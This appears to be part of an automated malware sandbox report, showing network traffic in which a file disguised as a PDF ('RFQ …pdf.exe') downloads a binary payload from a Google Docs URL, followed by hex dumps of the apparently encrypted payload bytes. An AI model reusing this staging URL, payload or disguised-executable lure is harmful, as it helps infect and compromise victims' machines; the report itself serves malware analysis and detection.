                            Transfer-Encoding: chunked
                            2021-12-01 10:57:38 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 74 6d 67 6b
                            Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgk
                            2021-12-01 10:57:38 UTC2INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.4 | 49796 | 216.58.198.33 | 443 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-01 10:57:38 UTC | 2 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Cache-Control: no-cache
                            Host: doc-00-50-docs.googleusercontent.com
                            Connection: Keep-Alive
                            2021-12-01 10:57:38 UTC | 2 | IN | HTTP/1.1 200 OK
                            X-GUploader-UploadID: ADPycdsOdseX3DzRWTiMz7pvvs2DsaKqt7dq4YExMGDT9FtuVBpnfdjfWDppYWQJhqS1hF6QvVbpI0_veIo29WVepCCRKNcoaA
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Credentials: false
                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, 
X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                            Access-Control-Allow-Methods: GET,OPTIONS
                            Content-Type: application/octet-stream
                            Content-Disposition: attachment;filename="Kelly_EsVTDBwyFh235.bin";filename*=UTF-8''Kelly_EsVTDBwyFh235.bin
                            Content-Length: 106560
                            Date: Wed, 01 Dec 2021 10:57:38 GMT
                            Expires: Wed, 01 Dec 2021 10:57:38 GMT
                            Cache-Control: private, max-age=0
                            X-Goog-Hash: crc32c=3XouAQ==
                            Server: UploadServer
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                            Connection: close
                            Data Ascii: -uG]\r?Xt.[j9c+T:m|Sw!_j>3M0^~fx.kPM(=&)_HtsL~o[&gG(A.b+m'r23auo&mdRH5`[ig&./qxo-qPFHK87uepPC~$=zD]WwFTIH'
                            2021-12-01 10:57:39 UTC22INData Raw: b7 4f 44 68 4f 07 30 ed 2b 20 91 c4 77 df 8e fe 83 5d 58 ab 93 bb 7b 32 47 28 d9 3d a0 b3 ee 1f 4d 7e 5a 2d 23 ac 7b f8 3b 43 80 c9 92 95 0a 24 7e eb 48 08 51 74 9e dc 85 ea 7e 2d 5a 90 c5 e3 44 f2 31 d0 be 2a 9c 96 1c 88 cf af 79 dd ce 78 3a 46 30 66 29 a2 a0 13 c9 59 43 2b 20 aa 2e 5b a5 b6 b6 03 29 b6 63 13 41 a0 d6 3a fd 04 c4 c6 e4 df 09 c7 12 2f b1 22 bb f2 af 71 57 dc a0 c3 06 d4 8e 1e 71 b0 d8 cc 1b 3e cf d4 23 22 0c c6 5f b7 6b 91 e1 5a 45 a6 ca 61 fc fd e8 84 8d 2d d6 73 5e fb 1d 88 61 ab d8 aa e6 c9 29 a9 17 41 de d4 dc 13 5e 62 b0 11 e3 f9 bc 30 0b fd 0a 78 ea 4c 0c 1f a3 c1 88 1d c7 3d e2 66 12 81 39 4d 30 05 6e df 91 af 96 f9 68 da 8a 58 90 50 6b cc cb 5c 77 23 9c 2b fe 04 9f 41 ff a5 6c 27 5b aa 8d be 1f c0 c9 fc d2 88 78 23 f4 56 4c b0 91
                            Data Ascii: ODhO0+ w]X{2G(=M~Z-#{;C$~HQt~-ZD1*yx:F0f)YC+ .[)cA:/"qWq>#"_kZEa-s^a)A^b0xL=f9M0nhXPk\w#+Al'[x#VL
                            2021-12-01 10:57:39 UTC23INData Raw: 3a 60 00 54 7e 68 14 49 e8 31 f3 d3 8c 56 74 b9 59 65 2a bb ae 9d 71 a1 0a 9f 48 90 64 23 25 13 12 8e 7d fe f5 18 35 ce c1 74 45 2a bc 4f 18 de cc a5 bd ac f4 d7 ec c4 8e dd 99 59 61 01 22 a2 60 60 62 1e 5f c3 38 2e c6 f6 55 1a 16 e6 3c c4 68 b0 bf 13 6f 7d ab 5a b7 6d d0 11 67 bc 25 a8 72 5f 7f be e8 69 67 0a bc 9a 26 f2 81 8a cb fd d6 2e 00 57 e5 35 82 cb f9 05 cd 0e ab 9e 0d 9c 71 99 72 a0 1a b0 73 a5 b6 79 ef 18 24 76 90 85 28 e0 54 23 68 01 48 61 1f 2c e2 b5 f0 e5 d4 fe c5 bb a5 19 05 61 df b6 ad 1d 50 5c 47 10 96 a0 c8 57 1f 36 82 53 11 a5 de e5 b8 3a 40 a0 d9 7f 36 3e 3d 98 64 d7 46 d9 97 68 91 f5 35 6b 2c 05 34 2d 37 64 d9 41 39 ab dc 9b bb cc a8 91 5c fe 6c 5a 42 ec 60 81 eb f6 33 a5 56 ed 3e 01 b0 a3 53 f7 5e 8f 17 f6 23 23 c4 d8 13 54 eb 84 a4
                            Data Ascii: :`T~hI1VtYe*qHd#%}5tE*OYa"``b_8.U<ho}Zmg%r_ig&.W5qrsy$v(T#hHa,aP\GW6S:@6>=dFh5k,4-7dA9\lZB`3V>S^##T
                            2021-12-01 10:57:39 UTC24INData Raw: 7f 1d f2 ba db ad 88 b3 32 ba e5 8e 7e d3 91 ff 82 69 68 96 aa 0d 36 ce 17 64 fc a2 00 24 62 dc fd 5e ff bb 03 4c 80 ec dc 99 ab 3c d8 33 5b 2d ce 45 10 0f 39 5f 65 d2 12 74 4c 61 35 c2 cb 3f 65 60 49 88 09 86 31 a1 19 3c 27 e1 ac 8d 21 c7 9a 75 8b d4 52 d2 fb d3 cd dc 41 a3 f6 ca 5c a2 05 a1 15 88 84 98 ce 83 e8 bf 70 10 35 a3 e2 4a a5 50 20 70 dc 0a d1 89 4e 81 65 aa 4d c8 0c 98 60 21 65 66 18 67 39 30 1d d1 22 87 ff bd 83 57 5e f7 eb 15 af 1e 9b af af 47 c4 8f bd f6 51 77 2c 43 4a 97 4d 57 cb 44 92 08 47 94 c7 3d 86 40 0e 94 2a 23 3c 2f 98 e5 c5 97 67 4a 65 bc b2 9a 6d ce 40 4a 20 7a 18 a0 bf 89 b0 6f 32 9f 9d c7 50 34 50 6b 61 86 07 dc b1 70 34 94 b1 f5 d8 f0 bb 65 9c 6d 75 d4 c6 cd 78 f7 09 ee bd 20 15 b3 8d b8 11 05 c3 e1 4b 2e 00 40 46 90 31 61 e9
                            Data Ascii: 2~ih6d$b^L<3[-E9_etLa5?e`I1<'!uRA\p5JP pNeM`!efg90"W^GQw,CJMWDG=@*#</gJem@J zo2P4Pkap4emux K.@F1a
                            2021-12-01 10:57:39 UTC26INData Raw: 4c 41 8b 2e 5c 4b 54 31 1b 2c 3f 23 d3 02 5c 2b d7 c7 cf 5f 7c 7a 7f 6c fe 31 9b 73 d3 dc b0 32 9a ac 71 b1 74 93 78 0d 12 4d 83 e7 6e 0f 24 0f 70 cd 5d c8 f1 23 80 81 82 48 91 80 b7 9b 79 2b 6a ad a4 d6 58 c5 79 fa 10 5e 01 f8 f9 48 0e a6 2f 3b 1c e7 2c cb 06 3a 36 6d 53 5b 58 ee 8d f6 d5 fe f2 47 9a c8 a0 8a a2 e0 c9 5a 20 62 89 08 b9 b8 b1 83 57 3c 77 87 48 a5 13 ff 16 c6 2e 18 8b 5a a9 dd f4 68 02 92 ff a8 49 01 f2 d5 df 10 97 91 26 59 9d 5c af 8d 82 48 5d bf 95 60 12 33 1b fd 0f 84 d6 1c d7 f5 f7 07 4a e8 09 f9 be 55 5f ee 94 2a 14 0d 06 eb 3b 5c 74 33 38 f0 33 da 0a 1d 14 45 f0 e7 01 72 0a 4b 7f a0 f6 b4 37 a7 3a 7f b4 36 f7 dd b8 ac de 3f 37 42 be 8c 84 84 bd 42 39 71 f3 32 8a 81 cc 27 5a 1f 9a e1 44 57 2d d7 bd 12 92 66 e0 e9 80 f3 3e 16 eb c6 b4
                            Data Ascii: LA.\KT1,?#\+_|zl1s2qtxMn$p]#Hy+jXy^H/;,:6mS[XGZ bW<wH.ZhI&Y\H]`3JU_*;\t383ErK7:6?7BB9q2'ZDW-f>
                            2021-12-01 10:57:39 UTC27INData Raw: 34 7e 21 47 cd bc c3 a5 1d b1 fc 64 5d 59 ef 67 22 a1 0a 08 b7 ab f7 ae 16 5c fc 1e f6 a4 e9 17 e1 0f 86 4f b0 77 bc 7b f4 09 5b dc 0a f2 79 43 20 8e aa bb 1c e7 b3 31 1d 45 e5 0b e1 ef 86 26 46 24 3f 38 08 ff 7a 29 5f 5a ba 81 94 60 63 8f f9 6f 35 54 1a 16 cc 72 4c d3 af 62 af 23 d5 15 a4 d0 67 c7 8d f0 ea 73 f8 f4 b3 dc 27 c0 22 b3 6a 2e ed 6a b2 22 9c b5 71 98 67 0c 2b 4e 2b a0 a1 8d e6 f1 d6 6e 57 22 d8 d0 15 65 74 c1 25 27 d2 be e1 49 95 42 13 a3 37 21 d4 e8 3f 21 8b 69 ff 2f 68 38 8d ac a9 0a b8 3e 71 6e 40 39 2d 6f a6 30 bf cd da 28 c2 40 7a fe b6 b5 26 a9 c9 bc 86 4e d8 53 52 1a 00 7e 46 67 97 d7 32 dc d0 d7 d4 83 9d f4 c0 3c e8 92 58 12 e5 08 d1 d9 48 0e 59 9f 2c 44 c9 2c 04 49 ab 7c 0a e7 e8 39 f2 37 6e c3 57 d2 11 e0 a3 86 b9 e5 5a 3e 0f 38 6f
                            Data Ascii: 4~!Gd]Yg"\Ow{[yC 1E&F$?8z)_Z`co5TrLb#gs'"j.j"qg+N+nW"et%'IB7!?!i/h8>qn@9-o0(@z&NSR~Fg2<XHY,D,I|97nWZ>8o
                            2021-12-01 10:57:39 UTC28INData Raw: 4c 24 c0 22 bb e1 72 85 34 0f f4 d6 fb 8c 39 53 8f 89 f4 58 c2 0e 67 62 5e 84 5d 38 5d 1d 65 4f 63 25 dd 8b b6 25 bc 6e 06 c5 ab d0 a7 bb c0 22 50 f0 f0 06 34 26 29 12 76 07 ca e0 7f 7e a9 78 f5 cb f0 58 f7 a9 75 a0 1b db a6 cd 0f 16 8f 51 e4 4a 6e aa 1c 29 68 c4 db 13 bb f7 97 67 f5 f7 41 76 e8 09 f3 3f b5 8d a8 bf 57 78 8f fe cc 40 66 d2 ff 73 57 e4 fc af 87 c4 31 68 ab 3d 41 de 59 2a 48 b4 27 20 0c 7e c5 b7 e3 b8 09 59 5c e7 db 75 7e e4 f8 72 01 3e 89 b5 c8 b1 b9 99 2a 74 7b d9 da 65 9d d9 19 40 6d 0d ff d3 bf e1 40 f3 60 96 01 13 9a 3f f8 c8 df ed 3f 61 cf 43 38 3b 5f b8 11 f9 e1 07 18 15 3e a9 c7 1a 5a f6 ce 4d d6 8a d3 98 b2 fa b4 c3 22 6c bf 33 d9 99 d9 14 2c 77 25 5b ce e8 17 97 02 d2 1c 21 6d 55 1e d9 97 3d f6 13 da 86 7a 5c 29 d7 6c 95 88 58 54
                            Data Ascii: L$"r49SXgb^]8]eOc%%n"P4&)v~xXuQJn)hgAv?Wx@fsW1h=AY*H' ~Y\u~r>*t{e@m@`??aC8;_>ZM"l3,w%[!mU=z\)lXT
                            2021-12-01 10:57:39 UTC29INData Raw: 48 6f af 94 2a d8 91 53 1b 89 3f d2 0d 9f 41 fd e1 97 92 db d9 2f b9 7a 3d db fd d2 fc 7f cf 0d 53 bc cb 7f f9 d7 47 e7 63 9e 86 9d 8b 30 19 a1 0f 3f a7 b4 ce d1 35 7e 64 23 6c 10 13 da 23 f7 a6 db 1c 11 ff ae f6 07 e6 94 38 4b 31 84 83 f0 11 b2 a6 c9 36 a2 d1 e0 d0 e5 75 21 ac 72 dc 67 11 71 e4 e8 26 3f 7e 66 11 f5 86 b7 7b c2 40 7a 46 3a 23 7d 74 52 53 39 e4 f9 09 49 37 a6 f4 1b 14 ce 3d 6a 1c 7c c0 64 b9 e1 cf 5f 49 47 63 f0 69 6b d2 c3 22 b6 f1 d4 a0 9e db 9f c4 31 ca 3e 83 df cb ee 70 50 34 36 23 ba f1 ae 86 b7 81 ae eb 0e 3e 85 35 74 50 6f 87 2d 2b c4 45 db b0 9b a2 3b 23 6a ed 02 f9 22 21 b4 7e fb 8f 93 e9 ad 40 aa 8f 0d e0 4c a6 a9 92 a8 ae c1 88 ac c6 a9 55 24 11 f2 0a aa 55 76 99 02 4c 39 4e 71 61 f6 f5 f2 d6 4f d9 d8 32 9f 6e 31 91 8a 25 41 8b
                            Data Ascii: Ho*S?A/z=SGc0?5~d#l#8K16u!rgq&?~f{@zF:#}tRS9I7=j|d_IGcik"1>pP46#>5tPo-+E;#j"!~@LU$UvL9NqaO2n1%A
                            2021-12-01 10:57:39 UTC31INData Raw: 75 0b cd d7 bb ef d3 4a 2c b7 0a f5 e7 33 1b 46 9b 3c 01 e3 ab 67 43 f1 db 9c 13 27 b9 1c 5f c1 de a3 e2 a4 9a a1 04 d7 27 8b f5 2b cd c0 57 5b 88 bb 4b e7 01 72 87 82 2e f3 9e ec ba cd 17 d3 a3 8b bd fa 2d c4 75 85 6d 8d be a3 5c aa 0a 40 cb 92 7c b9 2c 81 77 7b 8c de 65 9d e8 6b fb 56 c8 56 d3 36 e1 fb d7 f6 ca 7e ea 85 b4 d7 29 45 99 25 54 30 45 f2 d7 88 ab cd a7 6a cf ef c2 20 ec c6 44 d3 76 cf 19 69 75 77 4b 41 71 f3 16 03 f4 77 33 53 12 e2 c8 f5 fd c8 88 39 c1 43 66 c2 40 fd c4 0e 37 49 86 29 b0 38 07 9b 5d 7c 9d 4f 88 d2 c4 20 bb 26 ad 87 dc 18 51 36 cc bf e7 26 84 67 b0 05 88 ba 49 1a 7b f5 b0 09 a8 f1 0f 4f 63 86 cd eb 18 b4 7a 35 a3 1e 6b fd 22 6c bf 7c 98 be 49 f3 6e 24 85 48 d3 ec b7 aa 77 98 3f d2 9c 44 ea 81 05 63 74 b2 46 ba f5 50 be d9 6e
                            Data Ascii: uJ,3F<gC'_'+W[Kr.-um\@|,w{ekVV6~)E%T0Ej DviuwKAqw3S9Cf@7I)8]|O &Q6&gI{Ocz5k"l|In$Hw?DctFPn
                            2021-12-01 10:57:39 UTC32INData Raw: 6b 3a 16 92 bf 68 86 cd c3 07 e4 bc 50 b6 57 10 83 7a 62 b8 07 b0 fe ee 8e 1b 33 83 25 f9 23 e5 73 74 ee 8a 78 7f 86 b5 35 0c 9f f6 c2 04 a3 10 d4 15 1a a6 00 7f f8 14 9f d5 32 57 c6 fb dc 80 a3 eb 49 3b 57 18 3e a7 2b 86 b2 15 18 e6 04 1a 2c ec 14 14 b2 5f 40 0a dc cf 61 62 da c1 36 c3 ff ed 5e 6a 0d 29 ba fd 01 8c 3c 38 67 54 9e c8 c9 a0 d7 7e 6f 58 71 c1 f5 1c 53 2b 2e dc 77 6b 67 c9 86 36 fc c1 2b bf 21 0a 1a e9 30 9d e0 20 50 4e 48 50 d8 b8 8a 30 b6 ea 01 45 66 ae b6 59 94 e7 96 e0 e6 5e 65 87 20 61 ec 7f ac 28 41 69 c9 05 8a af 8d 46 58 d3 5a 01 5b fc 3e c4 d5 8e 4b e6 7f 62 2b 3d 70 6b 85 7d 44 8c dc e5 a1 06 50 ed 3d 67 d8 33 c9 b1 65 82 0c 24 cc 9f aa 86 e2 92 8d d6 09 2b ef f0 bd d8 9f 5c b3 71 ae 0e e1 e0 d0 d5 2b fb 59 2e 57 62 91 d2 96 21 91
                            Data Ascii: k:hPWzb3%#stx52WI;W>+,_@ab6^j)<8gT~oXqS+.wkg6+!0 PNHP0EfY^e a(AiFXZ[>Kb+=pk}DP=g3e$+\q+Y.Wb!
                            2021-12-01 10:57:39 UTC33INData Raw: 65 80 c2 f0 06 4a 89 4d dc c7 3a b4 46 70 d2 58 f7 ef 83 7f b0 23 e7 4b c4 3c 63 44 dc df f3 81 9c 89 3b 4b 66 12 44 13 8e 6a e4 81 02 28 21 ab 68 f4 1e 72 46 2a 54 f9 87 1a b2 30 aa 46 d7 fe dc 4d 45 15 66 65 be b5 2d 24 1e d9 e2 e7 fc 87 1d 79 b3 d6 ab 56 b0 ea 89 d7 f0 36 2a 53 60 d8 4f bf ca 0b 1f 89 36 d7 6c 4f 87 0b 1d 86 f5 5f 5c 61 af 51 9d 4c 5d 28 7f 35 2d 3b 8d 21 f2 2a a5 58 c7 00 d2 0f 3b c5 a6 d1 47 d0 81 0a f4 e6 1e e0 5d ab 0b 23 23 ec 66 d2 45 1b c8 fa 47 a7 ba c3 da a3 6f 81 a7 68 c9 73 86 71 a5 a0 fd 3c 39 99 de ad cd e8 0c f6 eb 21 4d 08 ba 58 c6 86 e9 10 f6 31 a7 1f 9b ab 7d ce 78 71 7a 26 1f 20 a1 fa 7d 86 ce 98 c4 bc f8 d8 0f ca fa b1 36 65 89 b0 d8 83 d5 61 0b 69 9b cb 24 84 13 c7 0b cc 9f bf 12 ef c4 90 97 8d 88 47 e7 a8 07 6c 76
                            Data Ascii: eJM:FpX#K<cD;KfDj(!hrF*T0FMEfe-$yV6*S`O6lO_\aQL](5-;!*X;G]##fEGohsq<9!MX1}xqz& }6eai$Glv
                            2021-12-01 10:57:39 UTC34INData Raw: b2 e7 99 1e af df 02 50 73 5d 20 ad 0f 0f 0b ba a9 3e 7f 6d 9e bc f6 c9 02 92 8b ce 58 d3 68 a1 09 38 16 91 b0 e7 f1 0b bf e7 29 90 7f 4e f1 ac 2d e9 30 0e 42 9b a4 46 a5 de af 10 f9 40 b7 7a 89 e2 59 50 af a8 88 40 3f 81 61 2e 50 e0 0b 04 85 bd 94 21 be 45 c4 ed d2 fe c0 1d 17 fe a8 6f 62 13 0e 7f b4 ed 3a a7 51 54 9d a4 29 00 07 df e4 f2 36 02 32 50 b1 64 37 d2 a9 d5 59 4f 72 e0 48 4f a8 4e 9f 53 c4 8e 4e 57 7f e3 ea 39 7a 9d ed b2 d1 26 e5 22 2a 7e da e0 3f 99 fa e2 07 b8 58 10 71 40 f6 4d ff 07 b8 1e 32 c4 f4 c0 66 80 05 e3 c0 9c d7 11 c7 7f a4 91 4f e4 02 50 b1 c1 7e bc c4 f2 b0 1c 14 b6 e1 58 a3 ee 4e 44 14 d8 5b 91 0d 3f 99 3e 3b 88 e2 d7 cf ce 15 7f 2b f9 34 2e 4d 5c 28 d9 43 48 25 8f c4 9f d5 5b a7 d0 00 5e 96 61 7b 95 a4 18 6e 02 26 8d 6f a3 cc
                            Data Ascii: Ps] >mXh8)N-0BF@zYP@?a.P!Eob:QT)62Pd7YOrHONSNW9z&"*~?Xq@M2fOP~XND[?>;+4.M\(CH%[^a{n&o
                            2021-12-01 10:57:39 UTC35INData Raw: 22 b3 8d 63 7f 3a b7 8e fa 3a 82 8a 0f c4 aa 98 d4 35 02 23 d4 83 ee 8e f9 c8 e0 f9 11 99 1a 3b 07 63 85 62 6b 84 1a b1 3a 7c c8 dd 3b af 36 c9 5d 51 5f 06 1a 8a 27 97 fe 0a b8 db 52 bb f9 ce 1d 24 b0 ee 05 67 58 00 b0 f2 89 24 0c 7c a3 57 d3 37 8b 2d cd f9 26 75 95 1d 4f 87 ac 15 72 82 de fc b9 1e 0a c7 13 8d b1 24 51 8e 48 ef 46 22 c2 fe d0 99 33 b3 de c4 68 1e a2 8c 0d 23 e5 b0 af 98 6e c3 84 37 db c8 86 82 06 76 f2 6e 0f 4a 4a 50 4f cc 2d 7d 6d 6a 25 8d 93 31 87 dc c2 39 95 8a d7 40 d4 4b d6 8f f2 86 ad 40 49 f6 71 5e b3 0f 0f c9 ae bb de d7 12 fd 31 0d f2 36 ae 09 f5 2f b5 7e c7 8b 39 4e e6 46 6f 87 20 df ee 52 d8 e2 22 0d 98 81 1d 8d ed 57 c0 4e 3a 32 82 1b 4d ab 4c 7e e3 83 de ae 66 8a ce a0 a6 09 8e e1 31 78 49 7d f4 7a 7e 60 24 29 76 36 7a dd b2
                            Data Ascii: "c::5#;cbk:|;6]Q_'R$gX$|W7-&uOr$QHF"3h#n7vnJJPO-}mj%19@K@Iq^16/~9NFo R"WN:2ML~f1xI}z~`$)v6z
                            2021-12-01 10:57:39 UTC37INData Raw: 4e c4 c9 2c ff 8d a3 92 b4 47 7f 00 ce f4 df 86 da 4b d2 3e 50 9c e2 b5 f2 f6 46 1b 9f 49 15 73 ed 8d 3f 7a 5c be 8c 84 fa df fc 2b 22 b1 f4 8c 29 11 83 f9 5e 9a 8a c2 9e 57 e8 4b c4 1c 6d f7 a0 03 66 49 7d 8a c6 3d 7a 9f bf 21 ce 4e ae 4d ec 89 83 97 48 73 0d 86 a2 4e 84 ad c6 97 1f 87 1b d1 d8 2c 6d ce e9 04 e3 93 4a 68 51 08 d9 e5 98 d8 d0 6b 8e 5a aa 5b 14 b0 fa 9e 03 d4 d6 69 bd 4c ab 33 79 81 82 cc b2 50 28 28 93 c4 b0 cd 2d 69 70 a9 28 82 af 13 6c 70 2f 9a d2 e1 60 c2 4b b4 e5 d6 f4 0b 7c de 43 08 95 1e 88 fd 1c 6e 7e b3 c2 b4 e1 30 bc 5b e4 d5 a9 d4 33 f7 f0 e6 df 41 d7 4f df c1 10 84 96 87 26 7e ce ae 79 8e 53 cd 1a cc 33 05 b3 39 da 1a e2 57 4f f3 f6 08 ba 58 c6 86 39 af 80 8e a7 3f c8 fd 79 15 2d 5f 38 39 6f 2f 07 15 8c a8 2b 05 49 67 24 c4 f3
                            Data Ascii: N,GK>PFIs?z\+")^WKmfI}=z!NMHsN,mJhQkZ[iL3yP((-ip(lp/`K|Cn~0[3AO&~yS39WOX9?y-_89o/+Ig$
                            2021-12-01 10:57:39 UTC38INData Raw: ef 3c 3c f3 cc b6 83 9b ba 26 e3 48 56 26 27 08 74 9b 1b 74 f1 93 8c 3a 76 ef cc a2 7f 52 41 fc e7 fd 37 23 8f e0 36 47 58 a6 b9 97 aa d6 c4 68 cc bc eb 16 dc 1b e9 9c 0b 67 cf 60 00 b4 24 8b 84 da 72 0b 2d a0 bd 22 b8 44 65 65 84 92 ba 25 60 fa cc 36 59 4e 61 42 05 77 a4 74 5c 81 0d be 70 38 b7 12 ca a4 a2 03 ae 0f e6 9b 2e 65 36 53 0e c3 03 cb 6e 80 48 a5 99 4a 69 39 c4 9d f0 8e a1 9d 9f ad 34 01 7a ac 28 31 08 b3 89 13 b0 af 66 c6 2b 27 3d 7a 0c 96 ba 93 dd 19 a3 74 44 3f b3 9f 39 dd b1 7b 8c 2c 49 b1 d5 5c e1 67 b3 ff f7 ac 28 22 85 0c 50 37 0f 7d 92 1e 3f 79 d4 0f 73 62 cb c9 62 98 f6 6e 7a 87 ef ab 76 fe 5c 1e da 69 d2 6f 55 78 76 c4 ea eb 50 71 52 9f 0a 17 16 e1 ba 1e c2 37 07 c0 7c 43 3c 0f d7 f4 e4 bf 6b 87 f2 9f 6c b5 a4 35 71 37 f6 e2 70 cd ba
                            Data Ascii: <<&HV&'tt:vRA7#6GXhg`$r-"Dee%`6YNaBwt\p8.e6SnHJi94z(1f+'=ztD?9{,I\g("P7}?ysbbnzv\ioUxvPqR7|C<kl5q7p
                            2021-12-01 10:57:39 UTC39INData Raw: 67 07 a2 d6 b9 fa 62 fc 80 88 3c 4d 9d a0 07 26 56 e4 ec c6 f2 6b b1 b4 46 a3 8d af 0a 8d 80 1c e7 e7 d3 13 e0 42 5b 1d 4f 4d cd 64 f3 66 0b 9b b8 c5 19 f3 f3 f1 2b bf 24 3b 58 1f e9 8b 0b a4 40 96 b2 6c 3b f4 4c d5 c1 98 91 b2 95 06 e0 c5 67 93 4d d9 4f b4 10 8c 89 44 69 fe 9b 79 04 66 f2 c4 93 85 61 4f f2 c0 e2 2a 56 7a a1 37 fc 89 aa 65 26 41 f9 f4 98 e4 b2 02 51 ce 73 bc 2d 98 a8 b3 e4 8c af 91 4e ef 9b 1a 32 17 6e 1d f7 a0 3e c9 38 7c 7a 13 55 f9 65 61 0e 29 fc 85 dd fd a6 37 02 a1 05 3b 38 cb 43 1b ab 4f fa 70 8b ad 7d 78 98 ad ce e7 f5 c6 c3 74 1a b6 43 74 d5 56 ad b5 96 69 f7 c7 61 e0 31 5f 3e 6f 4b 12 ef 17 ee d1 19 75 b8 14 8d e4 62 76 d9 57 c5 2d 1b fe 54 cf e4 6c f6 88 79 6c 27 47 1b 0c 6e c6 f0 36 18 e3 7b 54 d9 a4 23 a3 6f e8 25 aa 65 d6 0a
                            Data Ascii: gb<M&VkFB[OMdf+$;X@l;LgMODiyfaO*Vz7e&AQs-N2n>8|zUea)7;8COp}xtCtVia1_>oKubvW-Tlyl'Gn6{T#o%e
